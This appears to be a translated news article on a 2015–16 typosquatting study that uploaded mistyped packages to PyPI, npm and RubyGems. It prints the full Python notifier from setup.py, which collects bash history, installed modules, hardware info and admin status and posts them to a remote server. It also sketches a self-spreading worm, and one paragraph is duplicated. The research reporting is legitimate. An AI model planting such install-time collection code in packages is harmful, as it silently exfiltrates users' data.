Typosquatting in Python, Node.JS, and Ruby repositories
The effectiveness of the attack has been proven in the distribution of malicious code through the repositories PyPi (Python), Npmjs.com (Node.js) and rubygems.org (Ruby)
It turns out that typosquatting is not only suitable for registering domain names. German security specialist Nikolai Tschacher has demonstrated how easy it is to distribute malicious code through PyPi , a directory of software written in the Python programming language, as well as through the NodeJS repositories (Npmsjs.com) and Ruby (rubygems.org).
So, we publish the package with a typo in the title - and wait for someone to make a typo in their console ...
> sudo pip install reqeusts
During a small experiment, Nikolai infected 17,000 computers for research purposes, and 43.6% of the installations were performed with administrator rights, including on servers in the government domains .gov and .mil .
Typosquatting and Beatsquatting
Hackers have long been using typosquatting to drive random traffic to meaningless sites like microsodft.com. This attack is effective due to the laws of large numbers. If a billion people type the site URL in the address bar, then a million of them will make some kind of mistake. About a thousand will go to the prepared site, where they are waiting for an exploit pack using fresh 0day. Or, for example, you can just twist ads on such sites, receiving money from the air.
Traditional typosquatters register thousands of addresses; in advanced companies, along with the main domain, they always register possible typosquatting options by setting up a redirect. Some even use typosquatting to pick up someone else’s traffic. For example, Google redirects traffic to itself from the domain duck.com .
By the way, there’s also bittsquatting - an exotic kind of typosquatting. Here the calculation does not go to the human, but to a hardware error. Bitsquatting relies on the fact that any of the devices connected to the Internet accidentally makes a mistake and changes one necessary bit in the DNS query, so that the traffic goes instead of the original site to the attacker's site. For such attacks, the domains of CDN and ad networks are selected, the content of which is uploaded to thousands of popular sites. These are domains like fbcdn.net, 2mdn.net and akamai.com.
Traditional typosquatters register thousands of addresses; in advanced companies, along with the main domain, they always register possible typosquatting options by setting up a redirect. Some even use typosquatting to pick up someone else’s traffic. For example, Google redirects traffic to itself from the domain duck.com .
By the way, there’s also bittsquatting - an exotic kind of typosquatting. Here the calculation does not go to the human, but to a hardware error. Bitsquatting relies on the fact that any of the devices connected to the Internet accidentally makes a mistake and changes one necessary bit in the DNS query, so that the traffic goes instead of the original site to the attacker's site. For such attacks, the domains of CDN and ad networks are selected, the content of which is uploaded to thousands of popular sites. These are domains like fbcdn.net, 2mdn.net and akamai.com.
Nikolay Chaher got acquainted with the methods of standard typosquatting and asked the question: how many people will make a mistake in the name of the package if they manually install pockets through the package manager. For example, the pip package manager downloads packages from the PyPi repository. If we create an arbitrary package called reqeusts (anyone can upload it to the repository) instead of the standard requests module , then our package will be downloaded and installed by all users who make a typo when typing a command.
To test the effectiveness of the attack, Nikolai created 214 packageswith various types of typos in the name, including unregistered variants of names from the standard library (for example, urllib2), and uploaded them to the repository for several months in the second half of 2015 and early 2016.
In Python packages, malicious code was hidden in the setup.py file , which runs as administrator. A pre-installation script was written for NPM modules , but I had to tinker with Ruby packages .
When installing each fictitious Typosquatter package, a notification was sent to the server indicating the IP address, operating system, user rights and timestamp.
Notifier Code
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Notification program used in the typo squatting
bachelor thesis for the python package index.
Created in autumn 2015.
Copyright by Nikolai Tschacher
"""
import os
import ctypes
import sys
import platform
import subprocess
debug = False
# we are using Python3
if sys.version_info[0] == 3:
import urllib.request
from urllib.parse import urlencode
GET = urllib.request.urlopen
def python3POST(url, data={}, headers=None):
"""
Returns the response of the POST request as string or
False if the resource could not be accessed.
"""
data = urllib.parse.urlencode(data).encode()
request = urllib.request.Request(url, data)
try:
reponse = urllib.request.urlopen(request, timeout=15)
cs = reponse.headers.get_content_charset()
if cs:
return reponse.read().decode(cs)
else:
return reponse.read().decode('utf-8')
except urllib.error.HTTPError as he:
# try again if some 400 or 500 error was received
return ''
except Exception as e:
# everything else fails
return False
POST = python3POST
# we are using Python2
else:
import urllib2
from urllib import urlencode
GET = urllib2.urlopen
def python2POST(url, data={}, headers=None):
"""
See python3POST
"""
req = urllib2.Request(url, urlencode(data))
try:
response = urllib2.urlopen(req, timeout=15)
return response.read()
except urllib2.HTTPError as he:
return ''
except Exception as e:
return False
POST = python2POST
try:
from subprocess import DEVNULL # py3k
except ImportError:
DEVNULL = open(os.devnull, 'wb')
def get_command_history():
if os.name == 'nt':
# handle windows
# http://serverfault.com/questions/95404/
#is-there-a-global-persistent-cmd-history
# apparently, there is no history in windows :(
return ''
elif os.name == 'posix':
# handle linux and mac
cmd = 'cat {}/.bash_history | grep -E "pip[23]? install"'
return os.popen(cmd.format(os.path.expanduser('~'))).read()
def get_hardware_info():
if os.name == 'nt':
# handle windows
return platform.processor()
elif os.name == 'posix':
# handle linux and mac
if sys.platform.startswith('linux'):
try:
hw_info = subprocess.check_output('lshw -short',
stderr=DEVNULL, shell=True)
except:
hw_info = ''
if not hw_info:
try:
hw_info = subprocess.check_output('lspci',
stderr=DEVNULL, shell=True)
except:
hw_info = ''
hw_info += '\n' +\
os.popen('free -m').read().strip()
return hw_info
elif sys.platform == 'darwin':
# According to https://developer.apple.com/library/
# mac/documentation/Darwin/Reference/ManPages/
# man8/system_profiler.8.html
# no personal information is provided by detailLevel: mini
return os.popen('system_profiler -detailLevel mini').read()
def get_all_installed_modules():
# first try the default path
pip_list = os.popen('pip list').read().strip()
if pip_list:
return pip_list
else:
if os.name == 'nt':
paths = ('C:/Python27',
'C:/Python34',
'C:/Python26',
'C:/Python33',
'C:/Python35',
'C:/Python',
'C:/Python2',
'C:/Python3')
# try some paths that make sense to me
for loc in paths:
pip_location = os.path.join(loc, 'Scripts/pip.exe')
if os.path.exists(pip_location):
cmd = '{} list'.format(pip_location)
try:
pip_list = subprocess.check_output(cmd,
stderr=DEVNULL, shell=True)
except:
pip_list = ''
if pip_list:
return pip_list
return ''
def notify_home(url, package_name, intended_package_name):
host_os = platform.platform()
try:
admin_rights = bool(os.getuid() == 0)
except AttributeError:
try:
ret = ctypes.windll.shell32.IsUserAnAdmin()
admin_rights = bool(ret != 0)
except:
admin_rights = False
if os.name != 'nt':
try:
pip_version = os.popen('pip --version').read()
except:
pip_version = ''
else:
pip_version = platform.python_version()
url_data = {
'p1': package_name,
'p2': intended_package_name,
'p3': 'pip',
'p4': host_os,
'p5': admin_rights,
'p6': pip_version,
}
post_data = {
'p7': get_command_history(),
'p8': get_all_installed_modules(),
'p9': get_hardware_info(),
}
url_data = urlencode(url_data)
response = POST(url + url_data, post_data)
if debug:
print(response)
print('')
print("Warning!!! Maybe you made a typo in your installation\
command or the module does only exist in the python stdlib?!")
print("Did you want to install '{}'\
instead of '{}'??!".format(intended_package_name, package_name))
print('For more information, please\
visit http://svs-repo.informatik.uni-hamburg.de/')
def main():
if debug:
notify_home('http://localhost:8000/app/?',
'pmba_basic', 'pmba_basic')
else:
notify_home('http://svs-repo.informatik.uni-hamburg.de/app/?',
'pmba_basic', 'pmba_basic')
if __name__ == '__main__':
main()
The results were stunning. The server notifier received 45,334 installation notifications from 17,289 unique IP addresses .
Most installations generated dummy packages for PyPi: 15,221 unique IP addresses. Rubygems.org had 1631 installations, NPM - 525. On average, each package was installed 92 times, but urllib2 with 3929 unique installations was the most popular.
The victims of the attack were distributed between different operating systems: Linux (8614), Windows (6174), OS X (4758) and other OS (57).
The mapping of IP addresses to hosts gave the following picture.
Hosts nationality, by country
Full research results published in thesisNikolai Chaher.
By the way, the author offers the idea that this type of attack can be used to spread a worm that will mine the history of the entered commands in the console under Linux and OS X in order to find new typos that are not in the database.
Theoretically, the worm itself can search for new attack vectors (new typos), generate new packets, upload them to the repository along with its code, and thus spread further.